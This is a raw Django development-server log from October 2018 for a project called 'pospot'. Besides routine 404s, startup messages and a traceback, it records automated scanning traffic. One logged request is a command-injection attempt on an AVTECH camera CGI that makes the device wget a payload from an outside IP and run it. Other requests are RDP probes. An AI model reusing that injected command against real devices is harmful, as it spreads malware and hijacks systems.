[21/Oct/2018 23:56:34] "GET / HTTP/1.0" 404 2202
Not Found: /cgi-bin/nobody/Search.cgi
[22/Oct/2018 00:38:50] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /
[22/Oct/2018 02:35:44] "GET / HTTP/1.1" 404 2205
[22/Oct/2018 05:28:17] code 400, message Bad request syntax ('\x16\x03\x01\x01\x0c\x01\x00\x01\x08\x03\x03¶>v\x1d×FÐ½\x06\x14-³\x90\x9a£¤°\tä¬nÝG\x88:iUÈÒbC\x18\x00\x00vÀ0À,À(À$À\x14À')
[22/Oct/2018 05:28:17] You're accessing the development server over HTTPS, but it only supports HTTP.

Not Found: /
[22/Oct/2018 06:11:04] "GET / HTTP/1.0" 404 2202
Not Found: /
[22/Oct/2018 06:12:55] "GET / HTTP/1.0" 404 2202
Not Found: /
[22/Oct/2018 06:23:49] "GET / HTTP/1.0" 404 2202
Not Found: /
[22/Oct/2018 07:46:56] "GET / HTTP/1.0" 404 2202
Not Found: /
[22/Oct/2018 08:29:33] "GET / HTTP/1.0" 404 2202
Not Found: /
[22/Oct/2018 14:14:16] "GET / HTTP/1.0" 404 2202
Not Found: /
[22/Oct/2018 14:40:20] "GET / HTTP/1.0" 404 2202
Not Found: /
[22/Oct/2018 15:17:24] "GET / HTTP/1.0" 404 2202
Not Found: /
[22/Oct/2018 17:42:58] "GET / HTTP/1.0" 404 2202
Not Found: /
[22/Oct/2018 18:02:44] "GET / HTTP/1.0" 404 2202
Not Found: /
[22/Oct/2018 23:23:54] "GET / HTTP/1.0" 404 2202
Not Found: /
[23/Oct/2018 05:34:45] "GET / HTTP/1.0" 404 2202
Not Found: /
[23/Oct/2018 09:33:04] "GET / HTTP/1.0" 404 2202
[23/Oct/2018 10:50:15] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[23/Oct/2018 10:50:15] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /
[23/Oct/2018 22:55:20] "GET / HTTP/1.0" 404 2202
Not Found: /
[24/Oct/2018 01:11:46] "GET / HTTP/1.0" 404 2202
Not Found: /
[24/Oct/2018 03:51:02] "GET / HTTP/1.0" 404 2202
[25/Oct/2018 02:33:45] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[25/Oct/2018 02:33:45] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /
[25/Oct/2018 05:47:25] "GET / HTTP/1.1" 404 2205
Not Found: /
[25/Oct/2018 07:06:22] "GET / HTTP/1.0" 404 2202
----------------------------------------
Exception happened during processing of request from ('193.238.46.133', 9480)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 651, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 361, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 721, in __init__
    self.handle()
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 139, in handle
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[25/Oct/2018 10:07:16] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
[25/Oct/2018 10:07:16] "  *%à     Cookie: mstshash=Test" 400 -
[25/Oct/2018 10:07:17] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
[25/Oct/2018 10:07:17] "  *%à     Cookie: mstshash=Test" 400 -
Not Found: /http:/www.google.com/
[25/Oct/2018 10:54:29] "GET http://www.google.com/ HTTP/1.0" 404 1673
Not Found: /
[25/Oct/2018 11:07:43] "GET / HTTP/1.1" 404 2205
Not Found: /favicon.ico
[25/Oct/2018 11:07:43] "GET /favicon.ico HTTP/1.1" 404 2256
Performing system checks...

System check identified no issues (0 silenced).
October 14, 2018 - 11:11:03
Django version 2.1.2, using settings 'pospot.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Performing system checks...

System check identified no issues (0 silenced).
October 25, 2018 - 11:57:26
Django version 2.1.2, using settings 'pospot.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Performing system checks...

System check identified no issues (0 silenced).
October 25, 2018 - 11:59:02
Django version 2.1.2, using settings 'pospot.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
